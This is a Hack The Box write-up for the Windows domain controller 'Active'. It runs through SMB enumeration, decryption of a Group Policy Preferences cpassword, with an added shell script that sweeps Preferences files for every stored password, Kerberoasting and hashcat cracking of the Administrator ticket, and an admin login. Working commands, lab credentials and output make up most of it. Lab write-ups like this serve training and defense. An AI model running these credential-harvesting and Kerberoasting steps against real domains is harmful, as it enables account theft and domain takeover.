HTB: Active Write-Up
Target Machine Information:
· Hostname : ACTIVE
· IP Address : 10.10.10.100
· OS : Windows
RECON:
sudo bash nmapAutomator 10.10.10.100 Basic
# Nmap 7.91 scan initiated Tue May 11 17:21:47 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,49152,49153,49154,49155,49157,49158 -oN nmap/Basic_10.10.10.100.nmap --dns-server=1.1.1.1 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.069s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-11 21:23:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 1m51s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-11T21:24:43
|_ start_date: 2021-05-11T20:50:52
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 11 17:22:59 2021 -- 1 IP address (1 host up) scanned in 72.54 seconds
ENUMERATION:
enum4linux -a 10.10.10.100
sudo smbclient //10.10.10.100/Replication -U ""%""
The Replication share accepts a null session and has the same directory layout as SYSVOL. After logging in we navigate to the Preferences directory of the Default Domain Policy (GUID {31B2F340-016D-11D2-945F-00C04FB984F9}) and get the Groups.xml file:
smb: \> cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
We then go back to our attack machine to view Groups.xml. The interesting value is the "cpassword" attribute. Despite how it looks, it is not a hash: it is the account password, AES-256-CBC encrypted with a key that Microsoft published in the MS-GPPREF specification, so anyone who can read SYSVOL can decrypt it directly (MS14-025 removed the ability to set new passwords this way, but files that were already in SYSVOL are left behind).
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
A quick search confirms this, and Kali ships gpp-decrypt, which applies the published key for us.
┌──(kali㉿kali)-[~/Desktop/nmapAutomator/10.10.10.100]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
So the plaintext password is GPPstillStandingStrong2k18, and the userName attribute in the same Groups.xml entry shows the account it belongs to is "SVC_TGS".
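To see what gpp-decrypt actually does, here is an added example (not part of the original write-up, and not the gpp-decrypt tool itself) that performs the same decryption with only openssl, base64 and iconv, and then sweeps a Groups.xml file for every cpassword it contains. It assumes those three tools are installed; the AES key is the one published by Microsoft, and the Groups.xml at the end is a constructed, abbreviated sample built around the cpassword pulled from this box:

```shell
#!/bin/sh
# Added example, not code from the write-up. Reproduces gpp-decrypt's logic:
# cpassword = base64( AES-256-CBC( UTF-16LE(password) ) ) under a key that
# Microsoft published in MS-GPPREF, with an all-zero IV.
GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_IV=00000000000000000000000000000000

# gpp_decrypt CPASSWORD -> prints the plaintext password
gpp_decrypt() {
    cpass=$1
    # Group Policy strips the base64 '=' padding from cpassword; restore it so
    # base64 -d accepts the input (a length already divisible by 4 needs none).
    case $(( ${#cpass} % 4 )) in
        2) cpass="${cpass}==" ;;
        3) cpass="${cpass}=" ;;
    esac
    # Raw-key decryption (-K/-iv, so no "Salted__" header is expected); openssl
    # removes the PKCS#7 padding. The plaintext is UTF-16LE, so convert it.
    printf '%s' "$cpass" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
        | iconv -f UTF-16LE -t UTF-8
}

# gpp_extract FILE -> decrypts every cpassword="..." attribute in a Groups.xml
# (or any other Preferences XML) and prints one plaintext per line.
gpp_extract() {
    grep -o 'cpassword="[^"]*"' "$1" | sed 's/^cpassword="//; s/"$//' |
    while IFS= read -r c; do
        [ -n "$c" ] && gpp_decrypt "$c"
    done
}

# Constructed sample in the layout of the Groups.xml from the share above,
# with most attributes omitted; the cpassword value is the one from this box.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat >"$SAMPLE" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
EOF

gpp_extract "$SAMPLE"
```

Because the key is fixed and public, this is decryption, not cracking: there is no wordlist involved and it succeeds instantly for every cpassword ever written, which is why a SYSVOL sweep with gpp_extract is worth running against every Preferences file (Groups.xml, Services.xml, ScheduledTasks.xml, Drives.xml, DataSources.xml) a domain user can read.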
So with these credentials let's use smbmap to see which shares we now have access to.
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
We can then use smbclient to log in to the Users share and navigate to find our user.txt.
smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
get user.txt
┌──(root💀kali)-[~]
└─# cat user.txt
86d67d....
PRIVILEGE ESCALATION:
Since port 88 is open the DC is a Kerberos KDC, and with SVC_TGS we can Kerberoast: any authenticated domain user may request a service ticket (TGS) for any account that has an SPN set, and that ticket is encrypted with the service account's password hash. If the account still uses RC4 (etype 23) the ticket can be cracked offline at high speed. On this box the Administrator account has an SPN registered, so we request its ticket and crack it to get the admin password. (Defensively, each such request is a 4769 event on the DC with ticket encryption type 0x17, and long random service account passwords or gMSAs make the cracking step impractical.)
1. Grab "GetUserSPNs.py" from the impacket examples directory and copy it somewhere you can use it.
locate GetUserSPNs.py
cp ../../GetUserSPNs.py .
2. Now let's run it (it prompts for the SVC_TGS password we decrypted earlier).
python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPN.out
3. We get a hash
┌──(root💀kali)-[/home/kali/Desktop/nmapAutomator/10.10.10.100]
└─# cat GetUserSPN.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$54a8d2b2ecc2b0e7133a4859603299ca$...
4. The "$krb5tgs$23$" prefix tells us the ticket is RC4-HMAC (etype 23). In hashcat's mode list (hashcat --help | grep -i tgs) that corresponds to:
→13100 | Kerberos 5, etype 23, TGS-REP ←
(AES tickets would show up as "$krb5tgs$17$" or "$krb5tgs$18$", modes 19600 and 19700, and crack far more slowly.)
5. So our attack will be formatted like the following.
hashcat -a 0 -m 13100 GetUserSPN.out /usr/share/wordlists/rockyou.txt -O
The password cracks, and --show prints the hash with its plaintext appended:
hashcat -a 0 -m 13100 GetUserSPN.out /usr/share/wordlists/rockyou.txt -O --show
...c5d31:Ticketmaster1968
6. So now let's copy impacket's smbclient.py and log in as Administrator with the cracked password.
cp /opt/impacket/examples/smbclient.py .
python3 smbclient.py Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.23.dev1+20210127.141011.3673c588 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# use Users
# ls
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 .
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 ..
drw-rw-rw- 0 Mon Jul 16 06:14:21 2018 Administrator
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 All Users
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Default
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 Default User
-rw-rw-rw- 174 Mon Jul 16 17:01:17 2018 desktop.ini
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Public
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
# cd Administrator
# cd Desktop
# get root.txt
# exit
┌──(root💀kali)-[/home/kali/Desktop/nmapAutomator/10.10.10.100]
└─# cat root.txt
b5fc76d1...
Rooted and scooted!